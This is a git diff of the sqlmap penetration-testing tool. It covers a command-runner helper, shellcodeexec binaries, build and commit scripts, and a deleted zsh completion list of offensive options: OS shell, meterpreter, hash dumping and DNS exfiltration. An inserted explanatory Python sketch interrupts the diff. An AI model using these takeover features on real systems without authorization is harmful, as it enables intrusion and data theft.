2010 Miroslav Stampar - email: miroslav.stampar@gmail.com - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA -*/ - -#include -#include -#include -#include "stdafx.h" -#include - -using namespace std; -int main(int argc, char* argv[]) -{ - FILE *fp; - string cmd; - - for( int count = 1; count < argc; count++ ) - cmd += " " + string(argv[count]); - - fp = _popen(cmd.c_str(), "r"); - - if (fp != NULL) { - char buffer[BUFSIZ]; - - while (fgets(buffer, sizeof buffer, fp) != NULL) - fputs(buffer, stdout); - } - - return 0; -} +/* + runcmd - a program for running command prompt commands + Copyright (C) 2010 Miroslav Stampar + email: miroslav.stampar@gmail.com + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2.1 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. 
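For readers who just want the gist of runcmd.cpp: the program concatenates its command-line arguments into a single command string, opens that string as a read pipe and relays whatever the child process prints to its own standard output. A rough Python sketch of the same flow (illustrative only, not part of this patch; subprocess stands in for the _popen call used in the C code) could look like:

    #!/usr/bin/env python
    # Illustrative sketch of the runcmd.cpp flow: join all arguments into one
    # command string, run it through a pipe and copy its stdout to our stdout.
    import subprocess
    import sys

    def main():
        cmd = " ".join(sys.argv[1:])
        proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
        for line in iter(proc.stdout.readline, b""):
            sys.stdout.write(line.decode("utf-8", "replace"))
        return proc.wait()

    if __name__ == "__main__":
        main()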
+ + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA +*/ + +#include +#include +#include +#include "stdafx.h" +#include + +using namespace std; +int main(int argc, char* argv[]) +{ + FILE *fp; + string cmd; + + for( int count = 1; count < argc; count++ ) + cmd += " " + string(argv[count]); + + fp = _popen(cmd.c_str(), "r"); + + if (fp != NULL) { + char buffer[BUFSIZ]; + + while (fgets(buffer, sizeof buffer, fp) != NULL) + fputs(buffer, stdout); + } + + return 0; +} diff --git a/extra/runcmd/windows/runcmd/runcmd.vcproj b/extra/runcmd/src/runcmd/runcmd.vcproj similarity index 95% rename from extra/runcmd/windows/runcmd/runcmd.vcproj rename to extra/runcmd/src/runcmd/runcmd.vcproj index 928c71606b0..157e33863d9 100644 --- a/extra/runcmd/windows/runcmd/runcmd.vcproj +++ b/extra/runcmd/src/runcmd/runcmd.vcproj @@ -1,225 +1,225 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/extra/runcmd/windows/runcmd/stdafx.cpp b/extra/runcmd/src/runcmd/stdafx.cpp similarity index 97% rename from extra/runcmd/windows/runcmd/stdafx.cpp rename to extra/runcmd/src/runcmd/stdafx.cpp index f5e349538ca..e191a9156a4 100644 --- a/extra/runcmd/windows/runcmd/stdafx.cpp +++ b/extra/runcmd/src/runcmd/stdafx.cpp @@ -1,8 +1,8 @@ -// stdafx.cpp : source file that includes just the standard includes -// runcmd.pch will be the pre-compiled header -// stdafx.obj will contain the pre-compiled type information - -#include "stdafx.h" - -// TODO: reference any additional headers you need in STDAFX.H -// and not in this file +// stdafx.cpp : source file that includes just the standard includes +// runcmd.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/extra/runcmd/windows/runcmd/stdafx.h b/extra/runcmd/src/runcmd/stdafx.h similarity index 96% rename from extra/runcmd/windows/runcmd/stdafx.h rename to extra/runcmd/src/runcmd/stdafx.h index bdabbfb48e9..0be0e6ffee0 100644 --- a/extra/runcmd/windows/runcmd/stdafx.h +++ b/extra/runcmd/src/runcmd/stdafx.h @@ -1,17 +1,17 @@ -// stdafx.h : include file for standard system include files, -// or project specific include files that are used frequently, but -// are changed infrequently -// - -#pragma once - -#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later. -#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows. -#endif - -#include -#include - - - -// TODO: reference additional headers your program requires here +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later. +#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows. 
+#endif + +#include +#include + + + +// TODO: reference additional headers your program requires here diff --git a/extra/safe2bin/README.txt b/extra/safe2bin/README.txt deleted file mode 100644 index 06400d6ea98..00000000000 --- a/extra/safe2bin/README.txt +++ /dev/null @@ -1,17 +0,0 @@ -To use safe2bin.py you need to pass it the original file, -and optionally the output file name. - -Example: - -$ python ./safe2bin.py -i output.txt -o output.txt.bin - -This will create an binary decoded file output.txt.bin. For example, -if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will -be decoded to: " test 234 -newline" - -If you skip the output file name, general rule is that the binary -file names are suffixed with the string '.bin'. So, that means that -the upper example can also be written in the following form: - -$ python ./safe2bin.py -i output.txt diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py deleted file mode 100644 index 9e1072a9c4f..00000000000 --- a/extra/safe2bin/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py deleted file mode 100644 index 0c133b72448..00000000000 --- a/extra/safe2bin/safe2bin.py +++ /dev/null @@ -1,131 +0,0 @@ -#!/usr/bin/env python - -""" -safe2bin.py - Simple safe(hex) to binary format converter - -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii -import re -import string -import os -import sys - -from optparse import OptionError -from optparse import OptionParser - -# Regex used for recognition of hex encoded characters -HEX_ENCODED_CHAR_REGEX = r"(?P\\x[0-9A-Fa-f]{2})" - -# Regex used for recognition of representation for hex encoded invalid unicode characters -INVALID_UNICODE_CHAR_REGEX = r"(?P\\\?[0-9A-Fa-f]{2})" - -# Raw chars that will be safe encoded to their slash (\) representations (e.g. 
newline to \n) -SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" - -# Characters that don't need to be safe encoded -SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) - -# String used for temporary marking of slash characters -SLASH_MARKER = "__SLASH__" - -def safecharencode(value): - """ - Returns safe representation of a given basestring value - - >>> safecharencode(u'test123') - u'test123' - >>> safecharencode(u'test\x01\x02\xff') - u'test\\01\\02\\03\\ff' - """ - - retVal = value - - if isinstance(value, basestring): - if any(_ not in SAFE_CHARS for _ in value): - retVal = retVal.replace('\\', SLASH_MARKER) - - for char in SAFE_ENCODE_SLASH_REPLACEMENTS: - retVal = retVal.replace(char, repr(char).strip('\'')) - - retVal = reduce(lambda x, y: x + (y if (y in string.printable or ord(y) > 255) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) - - retVal = retVal.replace(SLASH_MARKER, "\\\\") - elif isinstance(value, list): - for i in xrange(len(value)): - retVal[i] = safecharencode(value[i]) - - return retVal - -def safechardecode(value, binary=False): - """ - Reverse function to safecharencode - """ - - retVal = value - if isinstance(value, basestring): - retVal = retVal.replace('\\\\', SLASH_MARKER) - - while True: - match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) - else: - break - - for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: - retVal = retVal.replace(repr(char).strip('\''), char) - - retVal = retVal.replace(SLASH_MARKER, '\\') - - if binary: - if isinstance(retVal, unicode): - retVal = retVal.encode("utf8") - while True: - match = re.search(INVALID_UNICODE_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), chr(ord(binascii.unhexlify(match.group("result").lstrip("\\?"))))) - else: - break - - elif isinstance(value, (list, tuple)): - for i in xrange(len(value)): - retVal[i] = safechardecode(value[i]) - - return retVal - -def main(): - usage = '%s -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') - - try: - parser.add_option('-i', dest='inputFile', help='Input file') - parser.add_option('-o', dest='outputFile', help='Output file') - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error('Missing the input file, -h for help') - - except (OptionError, TypeError), e: - parser.error(e) - - if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile - sys.exit(1) - - f = open(args.inputFile, 'r') - data = f.read() - f.close() - - if not args.outputFile: - args.outputFile = args.inputFile + '.bin' - - f = open(args.outputFile, 'wb') - f.write(safechardecode(data)) - f.close() - -if __name__ == '__main__': - main() diff --git a/extra/shellcodeexec/linux/shellcodeexec.x32_ b/extra/shellcodeexec/linux/shellcodeexec.x32_ index cc591725499..c0857d971f5 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x32_ and b/extra/shellcodeexec/linux/shellcodeexec.x32_ differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x64_ b/extra/shellcodeexec/linux/shellcodeexec.x64_ index 25aa6ea4a87..13ef7522987 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x64_ and b/extra/shellcodeexec/linux/shellcodeexec.x64_ differ diff --git 
a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ index a26bb6e1036..b55141d1d93 100644 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff --git a/extra/shutils/_sqlmap.py b/extra/shutils/_sqlmap.py deleted file mode 100644 index 44c33bfb1b4..00000000000 --- a/extra/shutils/_sqlmap.py +++ /dev/null @@ -1,177 +0,0 @@ -#compdef sqlmap.py - -# sqlmap completion commands. written by kost -# put this file in your zsh completion dir and restart your shell. Zsh completion dir is usually -# located somewhere in /usr/share/zsh/ or /usr/local/share/zsh - -local curcontext="$curcontext" state line - -_arguments -C -s \ - '(- *)'{--help,-h}'[Show basic help message and exit]' \ - '(- *)'-hh'[Show advanced help message and exit]' \ - '(-v)'-v+'[Verbosity level: 0-6 (default 1)]:Verbosity level (0-6) - default 1' \ - '(-d)'-d+'[Direct connection to the database]' \ - '(-u,--url)'{-u+,--url=-}'[Target url]' \ - '(-g)'-g+'[Process Google dork results as target urls]' \ - '(--data)'--data=-'[Data string to be sent through POST]' \ - '(-l)'-l+'[Parse targets from Burp or WebScarab proxy logs]:LOGFILE:_files' \ - '(-m)'-m+'[Scan multiple targets enlisted in a given textual file]:BULKFILE:_files' \ - '(-r)'-r+'[Load HTTP request from a file]:REQUESTFILE:_files' \ - '(-s)'-s+'[Load session from a stored (.sqlite) file]:SESSIONFILE:_files' \ - '(-c)'-c+'[Load options from a configuration INI file]:CONFIGFILE:_files' \ - '(--param-del)'--param-del=-'[Character used for splitting parameter values]:PDEL' \ - '(--cookie)'--cookie=-'[HTTP Cookie header]:COOKIE' \ - '(--load-cookies)'--load-cookies=-'[File containing cookies in Netscape/wget format]:COOKIEFILE:_files' \ - '(--drop-set-cookie)'--drop-set-cookie'[Ignore Set-Cookie header from response]' \ - '(--user-agent)'--user-agent=-'[HTTP User-Agent header]:HTTP User Agent' \ - '(--random-agent)'--random-agent'[Use randomly selected HTTP User-Agent header]' \ - '(--randomize)'--randomize=-'[Randomly change value for given parameter(s)]:RPARAM' \ - '(--force-ssl)'--force-ssl'[Force usage of SSL/HTTPS requests]' \ - '(--host)'--host=-'[HTTP Host header]:Host Header' \ - '(--referer)'--referer=-'[HTTP Referer header]:REFERER' \ - '(--headers)'--headers=-'[Extra headers (e.g. 
Accept-Language: fr\nETag: 123)]:HEADERS' \ - '(--auth-type)'--auth-type=-'[HTTP authentication type (Basic, Digest or NTLM)]:ATYPE' \ - '(--auth-cred)'--auth-cred=-'[HTTP authentication credentials (name:password)]:ACRED' \ - '(--auth-cert)'--auth-cert=-'[HTTP authentication certificate (key_file,cert_file)]:ACERT:_files' \ - '(--proxy)'--proxy=-'[Use a HTTP proxy to connect to the target url]:PROXY' \ - '(--proxy-cred)'--proxy-cred=-'[HTTP proxy authentication credentials (name:password)]:PCRED' \ - '(--ignore-proxy)'--ignore-proxy'[Ignore system default HTTP proxy]' \ - '(--delay)'--delay=-'[Delay in seconds between each HTTP request]:DELAY' \ - '(--timeout)'--timeout=-'[Seconds to wait before timeout connection (default 30)]:TIMEOUT' \ - '(--retries)'--retries=-'[Retries when the connection timeouts (default 3)]:RETRIES' \ - '(--scope)'--scope=-'[Regexp to filter targets from provided proxy log]:SCOPE' \ - '(--safe-url)'--safe-url=-'[Url address to visit frequently during testing]:SAFURL' \ - '(--safe-freq)'--safe-freq=-'[Test requests between two visits to a given safe url]:SAFREQ' \ - '(--skip-urlencode)'--skip-urlencode'[Skip URL encoding of payload data]' \ - '(--eval)'--eval=-'[Evaluate provided Python code before the request (e.g.]:EVALCODE' \ - '(-o)'-o'[Turn on all optimization switches]' \ - '(--predict-output)'--predict-output'[Predict common queries output]' \ - '(--keep-alive)'--keep-alive'[Use persistent HTTP(s) connections]' \ - '(--null-connection)'--null-connection'[Retrieve page length without actual HTTP response body]' \ - '(--threads)'--threads=-'[Max number of concurrent HTTP(s) requests (default 1)]:THREADS' \ - '(-p)'-p+'[Testable parameter(s)]:TESTPARAMETER' \ - '(--dbms)'--dbms=-'[Force back-end DBMS to this value]:DBMS:->list-dbms' \ - '(--os)'--os=-'[Force back-end DBMS operating system to this value]:OS:->list-os' \ - '(--invalid-bignum)'--invalid-bignum'[Use big numbers for invalidating values]' \ - '(--invalid-logical)'--invalid-logical'[Use logical operations for invalidating values]' \ - '(--no-cast)'--no-cast'[Turn off payload casting mechanism]' \ - '(--no-escape)'--no-unescape'[Turn off string escaping mechanism]' \ - '(--prefix)'--prefix=-'[Injection payload prefix string]:PREFIX' \ - '(--suffix)'--suffix=-'[Injection payload suffix string]:SUFFIX' \ - '(--skip)'--skip=-'[Skip testing for given parameter(s)]:SKIP' \ - '(--tamper)'--tamper=-'[Use given script(s) for tampering injection data]:TAMPER' \ - '(--level)'--level=-'[Level of tests to perform (1-5, default 1)]:LEVEL (1-5), default 1' \ - '(--risk)'--risk=-'[Risk of tests to perform (0-3, default 1)]:RISK (0-3), default 1' \ - '(--string)'--string=-'[String to match when query is evaluated to True]:STRING' \ - '(--not-string)'--not-string=-'[String to match when query is evaluated to False]:NOTSTRING' \ - '(--regexp)'--regexp=-'[Regexp to match when query is evaluated to True]:REGEXP' \ - '(--code)'--code=-'[HTTP code to match when query is evaluated to True]' \ - '(--text-only)'--text-only'[Compare pages based only on the textual content]' \ - '(--titles)'--titles'[Compare pages based only on their titles]' \ - '(--technique)'--technique=-'[SQL injection techniques to test for (default "BEUSTQ")]:TECH:->list-techniques' \ - '(--time-sec)'--time-sec=-'[Seconds to delay the DBMS response (default 5)]:TIMESEC' \ - '(--union-cols)'--union-cols=-'[Range of columns to test for UNION query SQL injection]:UCOLS' \ - '(--union-char)'--union-char=-'[Character to use for bruteforcing number of 
columns]:UCHAR' \ - '(--dns-domain)'--dns-domain=-'[Domain name used for DNS exfiltration attack]:DNSDOMAIN' \ - '(--second-order)'--second-order=-'[Resulting page url searched for second-order response]:SECONDORDER' \ - '(-f,--fingerprint)'{-f,--fingerprint}'[Perform an extensive DBMS version fingerprint]' \ - '(-a,--all)'{-a,--all}'[Retrieve everything]' \ - '(-b,--banner)'{-b,--banner}'[Retrieve DBMS banner]' \ - '(--current-user)'--current-user'[Retrieve DBMS current user]' \ - '(--current-db)'--current-db'[Retrieve DBMS current database]' \ - '(--hostname)'--hostname'[Retrieve DBMS server hostname]' \ - '(--is-dba)'--is-dba'[Detect if the DBMS current user is DBA]' \ - '(--users)'--users'[Enumerate DBMS users]' \ - '(--passwords)'--passwords'[Enumerate DBMS users password hashes]' \ - '(--privileges)'--privileges'[Enumerate DBMS users privileges]' \ - '(--roles)'--roles'[Enumerate DBMS users roles]' \ - '(--dbs)'--dbs'[Enumerate DBMS databases]' \ - '(--tables)'--tables'[Enumerate DBMS database tables]' \ - '(--columns)'--columns'[Enumerate DBMS database table columns]' \ - '(--schema)'--schema'[Enumerate DBMS schema]' \ - '(--count)'--count'[Retrieve number of entries for table(s)]' \ - '(--dump)'--dump'[Dump DBMS database table entries]' \ - '(--dump-all)'--dump-all'[Dump all DBMS databases tables entries]' \ - '(--search)'--search'[Search column(s), table(s) and/or database name(s)]' \ - '(-D)'-D+'[DBMS database to enumerate]:DB' \ - '(-T)'-T+'[DBMS database table to enumerate]:TBL' \ - '(-C)'-C+'[DBMS database table column to enumerate]:COL' \ - '(-U)'-U+'[DBMS user to enumerate]:USER' \ - '(--exclude-sysdbs)'--exclude-sysdbs'[Exclude DBMS system databases when enumerating tables]' \ - '(--start)'--start=-'[First query output entry to retrieve]:LIMITSTART' \ - '(--stop)'--stop=-'[Last query output entry to retrieve]:LIMITSTOP' \ - '(--first)'--first=-'[First query output word character to retrieve]:FIRSTCHAR' \ - '(--last)'--last=-'[Last query output word character to retrieve]:LASTCHAR' \ - '(--sql-query)'--sql-query=-'[SQL statement to be executed]:QUERY' \ - '(--sql-shell)'--sql-shell'[Prompt for an interactive SQL shell]' \ - '(--sql-file)'--sql-file=-'[Execute SQL statements from given file(s)]:SQLFILE:_files' \ - '(--common-tables)'--common-tables'[Check existence of common tables]' \ - '(--common-columns)'--common-columns'[Check existence of common columns]' \ - '(--udf-inject)'--udf-inject'[Inject custom user-defined functions]' \ - '(--shared-lib)'--shared-lib=-'[Local path of the shared library]:SHLIB' \ - '(--file-read)'--file-read=-'[Read a file from the back-end DBMS file system]:RFILE' \ - '(--file-write)'--file-write=-'[Write a local file on the back-end DBMS file system]:WFILE' \ - '(--file-dest)'--file-dest=-'[Back-end DBMS absolute filepath to write to]:DFILE' \ - '(--os-cmd)'--os-cmd=-'[Execute an operating system command]:OSCMD' \ - '(--os-shell)'--os-shell'[Prompt for an interactive operating system shell]' \ - '(--os-pwn)'--os-pwn'[Prompt for an out-of-band shell, meterpreter or VNC]' \ - '(--os-smbrelay)'--os-smbrelay'[One click prompt for an OOB shell, meterpreter or VNC]' \ - '(--os-bof)'--os-bof'[Stored procedure buffer overflow exploitation]' \ - '(--priv-esc)'--priv-esc'[Database process user privilege escalation]' \ - '(--msf-path)'--msf-path=-'[Local path where Metasploit Framework is installed]:MSFPATH' \ - '(--tmp-path)'--tmp-path=-'[Remote absolute path of temporary files directory]:TMPPATH' \ - '(--reg-read)'--reg-read'[Read a Windows registry key 
value]' \ - '(--reg-add)'--reg-add'[Write a Windows registry key value data]' \ - '(--reg-del)'--reg-del'[Delete a Windows registry key value]' \ - '(--reg-key)'--reg-key=-'[Windows registry key]:REGKEY' \ - '(--reg-value)'--reg-value=-'[Windows registry key value]:REGVAL' \ - '(--reg-data)'--reg-data=-'[Windows registry key value data]:REGDATA' \ - '(--reg-type)'--reg-type=-'[Windows registry key value type]:REGTYPE' \ - '(-t)'-t+'[Log all HTTP traffic into a textual file]:TRAFFICFILE' \ - '(--batch)'--batch'[Never ask for user input, use the default behaviour]' \ - '(--charset)'--charset=-'[Force character encoding used for data retrieval]:CHARSET' \ - '(--check-tor)'--check-tor'[Check to see if Tor is used properly]' \ - '(--crawl)'--crawl=-'[Crawl the website starting from the target url]:CRAWLDEPTH' \ - '(--csv-del)'--csv-del=-'[Delimiting character used in CSV output (default is ,)]:CSVDEL' \ - '(--dbms-cred)'--dbms-cred=-'[DBMS authentication credentials (user:password)]:DBMS authentication credentials' \ - '(--eta)'--eta'[Display for each output the estimated time of arrival]' \ - '(--flush-session)'--flush-session'[Flush session files for current target]' \ - '(--forms)'--forms'[Parse and test forms on target url]' \ - '(--fresh-queries)'--fresh-queries'[Ignores query results stored in session file]' \ - '(--hex)'--hex'[Uses DBMS hex function(s) for data retrieval]' \ - '(--output-dir)'--output-dir=-'[Custom output directory path]:ODIR' \ - '(--parse-errors)'--parse-errors'[Parse and display DBMS error messages from responses]' \ - '(--save)'--save'[Save options to a configuration INI file]' \ - '(--tor)'--tor'[Use Tor anonymity network]' \ - '(--tor-port)'--tor-port=-'[Set Tor proxy port other than default]:TORPORT' \ - '(--tor-type)'--tor-type=-'[Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)]:TORTYPE' \ - '(--update)'--update'[Update sqlmap]' \ - '(-z)'-z+'[Use short mnemonics (e.g. flu,bat,ban,tec=EU)]:MNEMONICS' \ - '(--check-payload)'--check-payload'[Offline WAF/IPS/IDS payload detection testing]' \ - '(--check-waf)'--check-waf'[Check for existence of WAF/IPS/IDS protection]' \ - '(--cleanup)'--cleanup'[Clean up the DBMS by sqlmap specific UDF and tables]' \ - '(--dependencies)'--dependencies'[Check for missing (non-core) sqlmap dependencies]' \ - '(--disable-coloring)'--disable-coloring'[Disable console output coloring]' \ - '(--gpage)'--gpage=-'[Use Google dork results from specified page number]:GOOGLEPAGE' \ - '(--mobile)'--mobile'[Imitate smartphone through HTTP User-Agent header]' \ - '(--page-rank)'--page-rank'[Display page rank (PR) for Google dork results]' \ - '(--purge-output)'--purge-output'[Safely remove all content from output directory]' \ - '(--smart)'--smart'[Conduct through tests only if positive heuristic(s)]' \ - '(--test-filter)'--test-filter=-'[Select tests by payloads and/or titles (e.g. 
ROW)]:test-filter' \ - '(--wizard)'--wizard'[Simple wizard interface for beginner users]' && return 0 - -case "$state" in - list-dbms) - _values -S : 'DBMS' 'access' 'db2' 'firebird' 'maxdb' 'mssqlserver' 'mysql' 'oracle' 'postgresql' \ - 'sqlite' 'sybase' - ;; - list-os) - _values -S : 'os' 'Linux' 'Windows' - ;; - list-techniques) - _values -S : 'technique' \ - 'B[Boolean]' 'E[Error]' 'U[Union]' 'S[Stacked]' 'T[Time]' - ;; -esac - -return 0 diff --git a/extra/shutils/autocompletion.sh b/extra/shutils/autocompletion.sh new file mode 100755 index 00000000000..edaccd73b62 --- /dev/null +++ b/extra/shutils/autocompletion.sh @@ -0,0 +1,9 @@ +#/usr/bin/env bash + +# source ./extra/shutils/autocompletion.sh + +DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" +WORDLIST=`python "$DIR/../../sqlmap.py" -hh | grep -Eo '\s\--?\w[^ =,]*' | grep -vF '..' | paste -sd "" -` + +complete -W "$WORDLIST" sqlmap +complete -W "$WORDLIST" ./sqlmap.py diff --git a/extra/shutils/blanks.sh b/extra/shutils/blanks.sh index dc91d6b1f60..3ba88a266ac 100755 --- a/extra/shutils/blanks.sh +++ b/extra/shutils/blanks.sh @@ -1,7 +1,7 @@ #!/bin/bash -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission # Removes trailing spaces from blank lines inside project files find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \; diff --git a/extra/shutils/drei.sh b/extra/shutils/drei.sh new file mode 100755 index 00000000000..c334b972e84 --- /dev/null +++ b/extra/shutils/drei.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +# Stress test against Python3(.14) + +for i in $(find . 
-iname "*.py" | grep -v __init__); do PYTHONWARNINGS=all python3.14 -m compileall $i | sed 's/Compiling/Checking/g'; done +source `dirname "$0"`"/junk.sh" diff --git a/extra/shutils/duplicates.py b/extra/shutils/duplicates.py old mode 100644 new mode 100755 index 1e27c6fc39e..5de6e357e57 --- a/extra/shutils/duplicates.py +++ b/extra/shutils/duplicates.py @@ -1,27 +1,30 @@ #!/usr/bin/env python -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission # Removes duplicate entries in wordlist like files +from __future__ import print_function + import sys -if len(sys.argv) > 0: - items = list() +if __name__ == "__main__": + if len(sys.argv) > 1: + items = list() - with open(sys.argv[1], 'r') as f: - for item in f.readlines(): - item = item.strip() - try: - str.encode(item) - if item in items: - if item: - print item - else: - items.append(item) - except: - pass + with open(sys.argv[1], 'r') as f: + for item in f: + item = item.strip() + try: + str.encode(item) + if item in items: + if item: + print(item) + else: + items.append(item) + except: + pass - with open(sys.argv[1], 'w+') as f: - f.writelines("\n".join(items)) + with open(sys.argv[1], 'w+') as f: + f.writelines("\n".join(items)) diff --git a/extra/shutils/junk.sh b/extra/shutils/junk.sh new file mode 100755 index 00000000000..544ccf12163 --- /dev/null +++ b/extra/shutils/junk.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +find . -type d -name "__pycache__" -exec rm -rf {} \; &>/dev/null +find . -name "*.pyc" -exec rm -f {} \; &>/dev/null diff --git a/extra/shutils/newlines.py b/extra/shutils/newlines.py new file mode 100644 index 00000000000..fe28a35ba99 --- /dev/null +++ b/extra/shutils/newlines.py @@ -0,0 +1,30 @@ +#! /usr/bin/env python + +from __future__ import print_function + +import os +import sys + +def check(filepath): + if filepath.endswith(".py"): + content = open(filepath, "rb").read() + pattern = "\n\n\n".encode("ascii") + + if pattern in content: + index = content.find(pattern) + print(filepath, repr(content[index - 30:index + 30])) + +if __name__ == "__main__": + try: + BASE_DIRECTORY = sys.argv[1] + except IndexError: + print("no directory specified, defaulting to current working directory") + BASE_DIRECTORY = os.getcwd() + + print("looking for *.py scripts in subdirectories of '%s'" % BASE_DIRECTORY) + for root, dirs, files in os.walk(BASE_DIRECTORY): + if any(_ in root for _ in ("extra", "thirdparty")): + continue + for name in files: + filepath = os.path.join(root, name) + check(filepath) diff --git a/extra/shutils/pep8.sh b/extra/shutils/pep8.sh deleted file mode 100755 index 7abe562b5a0..00000000000 --- a/extra/shutils/pep8.sh +++ /dev/null @@ -1,7 +0,0 @@ -#!/bin/bash - -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -# Runs pep8 on all python files (prerequisite: apt-get install pep8) -find . 
-wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \; diff --git a/extra/shutils/postcommit-hook.sh b/extra/shutils/postcommit-hook.sh new file mode 100755 index 00000000000..07d91a222b7 --- /dev/null +++ b/extra/shutils/postcommit-hook.sh @@ -0,0 +1,34 @@ +#!/bin/bash + +: ' +cat > .git/hooks/post-commit << EOF +#!/bin/bash + +source ./extra/shutils/postcommit-hook.sh +EOF + +chmod +x .git/hooks/post-commit +' + +SETTINGS="../../lib/core/settings.py" +PYPI="../../extra/shutils/pypi.sh" + +declare -x SCRIPTPATH="${0}" + +FULLPATH=${SCRIPTPATH%/*}/$SETTINGS + +if [ -f $FULLPATH ] +then + LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"') + declare -a LINE + NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE") + if [ -n "$NEW_TAG" ] + then + #git commit -am "Automatic monthly tagging" + echo "Creating new tag ${NEW_TAG}" + git tag $NEW_TAG + git push origin $NEW_TAG + echo "Going to push PyPI package" + /bin/bash ${SCRIPTPATH%/*}/$PYPI + fi +fi diff --git a/extra/shutils/precommit-hook.sh b/extra/shutils/precommit-hook.sh new file mode 100755 index 00000000000..300916ae369 --- /dev/null +++ b/extra/shutils/precommit-hook.sh @@ -0,0 +1,42 @@ +#!/bin/bash + +: ' +cat > .git/hooks/pre-commit << EOF +#!/bin/bash + +source ./extra/shutils/precommit-hook.sh +EOF + +chmod +x .git/hooks/pre-commit +' + +PROJECT="../../" +SETTINGS="../../lib/core/settings.py" +DIGEST="../../data/txt/sha256sums.txt" + +declare -x SCRIPTPATH="${0}" + +PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT +SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS +DIGEST_FULLPATH=${SCRIPTPATH%/*}/$DIGEST + +git diff $SETTINGS_FULLPATH | grep "VERSION =" > /dev/null && exit 0 + +if [ -f $SETTINGS_FULLPATH ] +then + LINE=$(grep -o ${SETTINGS_FULLPATH} -e '^VERSION = "[0-9.]*"') + declare -a LINE + INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); 